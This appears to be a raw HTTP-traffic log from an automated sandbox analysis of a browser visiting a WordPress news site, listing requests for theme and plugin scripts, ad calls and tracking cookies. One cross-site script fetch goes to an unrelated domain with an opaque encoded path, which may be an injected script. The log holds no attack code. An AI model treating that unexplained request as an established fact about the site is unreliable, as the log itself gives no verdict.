        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core.js?ver=56 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/image-map-pro-wordpress/js/image-map-pro.min.js?ver=5.3.2 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/metorik-helper/assets/js/metorik.min.js?ver=2.0.9 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ad.php?do=js&zid=117078&oid=27064&wd=-1&ht=-1&target=_blank HTTP/1.1Host: g.adspeed.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/advanced-ads-pro/assets/js/advanced-ads-pro.min.js?ver=2.26.1 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/jnews/assets/img/jeg-empty.png HTTP/1.1Host: hardylive.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/hoverIntent.min.js?ver=1.10.2 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /category/eprint/ HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/imagesloaded.min.js?ver=5.0.0 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/jnews/assets/dist/frontend.min.js?ver=1.0.0 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=aab4a5 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/css/dist/block-library/style.min.css?ver=0b25e1 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ad.php?do=js&zid=117078&oid=27064&wd=-1&ht=-1&target=_blank HTTP/1.1Host: g.adspeed.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=aab4a5 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY= HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/jnews/assets/dist/image/preloader.gif HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hardylive.com/wp-content/themes/jnews/assets/dist/frontend.min.css?ver=1.0.0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/jnews/assets/dist/frontend.min.js?ver=1.0.0 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Range: bytes=163620-163620If-Range: Wed, 13 Nov 2024 21:11:58 GMT
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=aab4a5 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=aab4a5 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /forms/dazzled-shocked-individual-dressed-in-casual-shirt.png HTTP/1.1Host: static.mailster.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ad.php?do=js&zid=117078&oid=27064&wd=-1&ht=-1&target=_blank&cb=0.27459611524525585&ref=https%3A//hardylive.com/&uri=https%3A//hardylive.com/category/eprint/ HTTP/1.1Host: g.adspeed.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/jnews/assets/dist/image/preloader.gif HTTP/1.1Host: hardylive.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/jnews/assets/dist/font/jegicon.woff HTTP/1.1Host: hardylive.comConnection: keep-aliveOrigin: https://hardylive.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://hardylive.com/wp-content/themes/jnews/assets/dist/frontend.min.css?ver=1.0.0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ajax-login-and-registration-modal-popup/assets/img/cd-icon-close.svg HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core-compiled.css?ver=56Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/jnews/assets/dist/frontend.min.js?ver=1.0.0 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Range: bytes=163620-308954If-Range: Wed, 13 Nov 2024 21:11:58 GMT
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/url.min.js?ver=e87eb76272a3a08402d2 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/api-fetch.min.js?ver=d387b816bc1ed2042e28 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ad.php?do=imp&aid=1125399&zid=117078&t=1741716181&auth=108567e63140a07de4bc55b82a10706c&oid=27064&wd=-1&ht=-1&ref=https%3A%2F%2Fhardylive.com%2F&uri=https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F HTTP/1.1Host: g.adspeed.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ajax-login-and-registration-modal-popup/assets/img/cd-icon-close.svg HTTP/1.1Host: hardylive.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22url%22%3A%22https%3A%2F%2Fhardylive.com%2F%22%2C%22mtke%22%3A%22(none)%22%2C%22utm_campaign%22%3A%22(none)%22%2C%22utm_source%22%3A%22(direct)%22%2C%22utm_medium%22%3A%22(none)%22%2C%22utm_content%22%3A%22(none)%22%2C%22utm_id%22%3A%22(none)%22%2C%22utm_term%22%3A%22(none)%22%2C%22session_entry%22%3A%22https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%22%2C%22session_start_time%22%3A%222025-03-11%2018%3A03%3A01%22%2C%22session_pages%22%3A%221%22%2C%22session_count%22%3A%221%22%7D
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/dom-ready.min.js?ver=f77871ff7694fffea381 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.9.7.1 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22url%22%3A%22https%3A%2F%2Fhardylive.com%2F%22%2C%22mtke%22%3A%22(none)%22%2C%22utm_campaign%22%3A%22(none)%22%2C%22utm_source%22%3A%22(direct)%22%2C%22utm_medium%22%3A%22(none)%22%2C%22utm_content%22%3A%22(none)%22%2C%22utm_id%22%3A%22(none)%22%2C%22utm_term%22%3A%22(none)%22%2C%22session_entry%22%3A%22https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%22%2C%22session_start_time%22%3A%222025-03-11%2018%3A03%3A01%22%2C%22session_pages%22%3A%221%22%2C%22session_count%22%3A%221%22%7D; sbjs_session=pgs%3D2%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F
